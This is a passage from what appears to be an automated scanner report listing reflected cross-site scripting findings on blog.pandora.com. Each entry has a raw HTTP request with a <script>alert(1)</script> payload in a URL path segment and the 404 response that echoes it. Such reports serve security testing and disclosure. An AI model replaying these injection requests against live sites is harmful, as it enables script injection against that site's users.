GET /pandora/archives/2010/0942f15<script>alert(1)</script>866bd41379a/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:31 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2010/0942f15<script>alert(1)</script>866bd41379a/ was not found on this server.</p>
...[SNIP]...

3.266. http://blog.pandora.com/pandora/archives/2010/09/tim-on-cnbc-1.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2010/09/tim-on-cnbc-1.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 88323<script>alert(1)</script>dd84e5ab0d7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora88323<script>alert(1)</script>dd84e5ab0d7/archives/2010/09/tim-on-cnbc-1.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:36 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 367
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora88323<script>alert(1)</script>dd84e5ab0d7/archives/2010/09/tim-on-cnbc-1.html was not found on this server.</p>
...[SNIP]...

3.267. http://blog.pandora.com/pandora/archives/2010/09/tim-on-cnbc-1.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2010/09/tim-on-cnbc-1.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload cd772<script>alert(1)</script>ee6bc22579c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archivescd772<script>alert(1)</script>ee6bc22579c/2010/09/tim-on-cnbc-1.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:38 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 367

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivescd772<script>alert(1)</script>ee6bc22579c/2010/09/tim-on-cnbc-1.html was not found on this server.</p>
...[SNIP]...

3.268. http://blog.pandora.com/pandora/archives/2010/09/tim-on-cnbc-1.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2010/09/tim-on-cnbc-1.html

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 244d1<script>alert(1)</script>0057edf899 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2010244d1<script>alert(1)</script>0057edf899/09/tim-on-cnbc-1.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:41 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 366

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2010244d1<script>alert(1)</script>0057edf899/09/tim-on-cnbc-1.html was not found on this server.</p>
...[SNIP]...

3.269. http://blog.pandora.com/pandora/archives/2010/09/tim-on-cnbc-1.html [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2010/09/tim-on-cnbc-1.html

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 80718<script>alert(1)</script>b33c32116fb was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2010/0980718<script>alert(1)</script>b33c32116fb/tim-on-cnbc-1.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:43 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 367

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2010/0980718<script>alert(1)</script>b33c32116fb/tim-on-cnbc-1.html was not found on this server.</p>
...[SNIP]...

3.270. http://blog.pandora.com/pandora/archives/2010/09/tim-on-cnbc-1.html [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2010/09/tim-on-cnbc-1.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 7f010<script>alert(1)</script>db22de039d1 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2010/09/tim-on-cnbc-1.html7f010<script>alert(1)</script>db22de039d1 HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:46 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 367

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2010/09/tim-on-cnbc-1.html7f010<script>alert(1)</script>db22de039d1 was not found on this server.</p>
...[SNIP]...

3.271. http://blog.pandora.com/pandora/archives/2010/10/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2010/10/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 6a980<script>alert(1)</script>ab4f3aefded was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora6a980<script>alert(1)</script>ab4f3aefded/archives/2010/10/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:23 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora6a980<script>alert(1)</script>ab4f3aefded/archives/2010/10/ was not found on this server.</p>
...[SNIP]...

3.272. http://blog.pandora.com/pandora/archives/2010/10/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2010/10/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f9630<script>alert(1)</script>c4b6b39b005 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archivesf9630<script>alert(1)</script>c4b6b39b005/2010/10/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:25 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 349
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesf9630<script>alert(1)</script>c4b6b39b005/2010/10/ was not found on this server.</p>
...[SNIP]...

3.273. http://blog.pandora.com/pandora/archives/2010/10/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2010/10/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 52dc5<script>alert(1)</script>f6f7326f783 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/201052dc5<script>alert(1)</script>f6f7326f783/10/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:27 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/201052dc5<script>alert(1)</script>f6f7326f783/10/ was not found on this server.</p>
...[SNIP]...

3.274. http://blog.pandora.com/pandora/archives/2010/10/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2010/10/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 46f70<script>alert(1)</script>135aca784e3 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2010/1046f70<script>alert(1)</script>135aca784e3/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:30 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2010/1046f70<script>alert(1)</script>135aca784e3/ was not found on this server.</p>
...[SNIP]...

3.275. http://blog.pandora.com/pandora/archives/2010/10/an-update-on-pa.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2010/10/an-update-on-pa.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 639cf<script>alert(1)</script>9472b7ae95 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora639cf<script>alert(1)</script>9472b7ae95/archives/2010/10/an-update-on-pa.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:39 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 368

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora639cf<script>alert(1)</script>9472b7ae95/archives/2010/10/an-update-on-pa.html was not found on this server.</p>
...[SNIP]...

3.276. http://blog.pandora.com/pandora/archives/2010/10/an-update-on-pa.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2010/10/an-update-on-pa.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6f725<script>alert(1)</script>f0ece6ca7d6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives6f725<script>alert(1)</script>f0ece6ca7d6/2010/10/an-update-on-pa.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:41 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 369

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives6f725<script>alert(1)</script>f0ece6ca7d6/2010/10/an-update-on-pa.html was not found on this server.</p>
...[SNIP]...

3.277. http://blog.pandora.com/pandora/archives/2010/10/an-update-on-pa.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2010/10/an-update-on-pa.html

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 4a6a1<script>alert(1)</script>e95f295a886 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/20104a6a1<script>alert(1)</script>e95f295a886/10/an-update-on-pa.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:43 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 369

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/20104a6a1<script>alert(1)</script>e95f295a886/10/an-update-on-pa.html was not found on this server.</p>
...[SNIP]...

3.278. http://blog.pandora.com/pandora/archives/2010/10/an-update-on-pa.html [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2010/10/an-update-on-pa.html

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 93473<script>alert(1)</script>78dc3d1265 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2010/1093473<script>alert(1)</script>78dc3d1265/an-update-on-pa.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:46 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 368

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2010/1093473<script>alert(1)</script>78dc3d1265/an-update-on-pa.html was not found on this server.</p>
...[SNIP]...

3.279. http://blog.pandora.com/pandora/archives/2010/10/an-update-on-pa.html [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2010/10/an-update-on-pa.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 57715<script>alert(1)</script>6156d1c3fc4 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2010/10/an-update-on-pa.html57715<script>alert(1)</script>6156d1c3fc4 HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:49 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 369

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2010/10/an-update-on-pa.html57715<script>alert(1)</script>6156d1c3fc4 was not found on this server.</p>
...[SNIP]...

3.280. http://blog.pandora.com/pandora/archives/2010/10/hoboken-town-ha.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2010/10/hoboken-town-ha.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a04ff<script>alert(1)</script>1d9d8606f67 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandoraa04ff<script>alert(1)</script>1d9d8606f67/archives/2010/10/hoboken-town-ha.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:24 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 369

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandoraa04ff<script>alert(1)</script>1d9d8606f67/archives/2010/10/hoboken-town-ha.html was not found on this server.</p>
...[SNIP]...

3.281. http://blog.pandora.com/pandora/archives/2010/10/hoboken-town-ha.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2010/10/hoboken-town-ha.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6b806<script>alert(1)</script>2370e6bb9b0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives6b806<script>alert(1)</script>2370e6bb9b0/2010/10/hoboken-town-ha.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:28 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 369
Connection: close
Content-Type: text/html

